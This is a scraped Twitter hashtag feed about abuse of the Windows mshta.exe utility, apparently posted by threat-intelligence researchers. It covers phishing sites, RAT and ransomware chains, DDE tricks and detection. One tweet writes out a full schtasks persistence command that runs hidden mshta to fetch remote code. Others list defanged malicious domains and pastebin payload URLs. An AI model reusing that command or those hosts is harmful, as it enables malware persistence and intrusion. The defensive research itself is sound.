-
#opendir@UN-themed#phishing#malware site www.sso.unite.un[.]org.joelwisian[.]com hosts ~3#trojan#droppers + 2#NorthKorea#macro#powershell#mshta North_Korea.docm (MD5: 5c5bf32736a852c1a1c40d0ae5b8ec33) Ref: https://tinyurl.com/yyffhwun@JAMESWT_MHT - beat me to it lol https://twitter.com/JAMESWT_MHT/status/1177115401400016901 …pic.twitter.com/m1zi60dBqX
Prikaži ovu nit -
#LNK: A perfect vector for living-off-the-land attacks, by@Symantec Threat Engineering Team (@threatintel)#infosec#threathunting#lolbins#mshta https://medium.com/threat-intel/lnk-files-living-off-the-land-11c1e2218dc2 …pic.twitter.com/wpP8hw3jCX
-
We're getting evil here .
#AbsoluteZero#MSHTA#payload integrated successfully.
Next one 
Encrypted connection.pic.twitter.com/RpPLBSl9fm
-
What Is
#Microsoft#Mshta, How Can It Be Used And How To Protect Against It - http://bit.ly/2YiSnM3-Ttx http://www.viruss.eu/
#SecurityPros#CyberDefense#CyberRisks#Vulnerabilities#CyberThreats#CyberAttacks#CyberSecurity#SoftwareFlaws#InfoSec#ApplicationSecuritypic.twitter.com/vJtwhTxufD
-
#Remote#Code#Execution#RCE using#LOLBINs e.g.#mshta#regsvr32 and#wmic native services at#Microsoft#Windows platform. The#Vulnerability can be addressed by changing the default application for files with an#hta extension.#CyberSecurity#CyberAwarenesshttps://twitter.com/McAfee_Labs/status/1155878432326246400 … -
#revenge#RAT#mshta#powershell#RTF#XML pastebin{.} com/raw/gnYu4MJK > pastebin{.} com/raw/aiahAcurpic.twitter.com/wFCNVVGURs
Prikaži ovu nit -
#Schtasks#Mshta "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 500 /tn "MSOFFICEER" /tr "mshta vbscript:CreateObject(\"Wscript[.]Shell\").Run(\"mshta.exe <URL>\",0,true)(window.close)" /F#CyberSecurity#Malware -
#MSHTA spwaned by#SVCHOST as seen in#LethalHTA by yt0ng · Pull Request #102 · Neo23x0/sigmahttps://github.com/Neo23x0/sigma/pull/102 … -
Living off the Land (LoL) with
#Microsoft, Part II:#Mshta,#HTA, and#Ransomware https://buff.ly/2HuI9Le pic.twitter.com/dWLWctEFs9
-
#PE ->#mshta (/update.drp.su/mustang/tools/run.hta) -> moves window to (-50000, 0), redirects to (/mustang/main.html). It includes ./main.js (#JScript) ->#bitsadmin ( /download.drp.su/soft/ + window.lang === 'ru' ? 'AvastAntivirusB.exe' : 'AvastAntivirusWorldwideE.exe')pic.twitter.com/bfFpAQ9jat
Prikaži ovu nit -
New release of
#oletools inspired me to investigate#dde capability in#excel. Awesome updt. But is it only about cmd? No. You can run any cmd with#dde. In this example, I show how to use#mshta to run notepad via#dde. limitation: len(cmd name) <= 8 chars@decalage2@Oddvarmoepic.twitter.com/7JWKCAXAra
Prikaži ovu nit -
#multi#stage:#docx contains external#Relationship elm (#oleObject) ->#rtf doc contains#ole obj --> execs#mshta to dl/exec#hta (#exploit) ->#vbscript runs#powershell to dl#PE file (All external files are hosted on amazon#aws#s3@AWS_Security) https://www.hybrid-analysis.com/sample/93f29c160c9ead39ebfdc2ba17206ffeb02f0799253e500084b924f74518a68a?environmentId=100 …pic.twitter.com/noaJR6kqwV
Prikaži ovu nit -
Like many
#ransomware,#Scarab is asking for a#Bitcoin
payment after #encrypting files. Scarab is using an encrypted#mshta command to delete#shadow copy. See how#SentinelOne agent is capable of detecting it pre-execution using Static and Behavioural AIhttps://www.youtube.com/watch?v=4RsTF8ZeoX0&t=11s … -
Wanna protect school children? Make Schools Hard Targets Again.
#MSHTA#AskingForTheChildren#ParklandShootingpic.twitter.com/ZzJyjzGDxY
-
Looking at telemetry coming from our agents, It seems
#malware creators really like using#Mshta, but@sentinelone is catching it#Cybersecurity#Ransomwarepic.twitter.com/v09AulI49b -
-
#MSHTA#HTML#JavaScript#IE Некоторые факты об mshta.exe: 1. Помешать закрыть окно с не сохранёнными данными при …http://juick.com/2835656 -
-
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.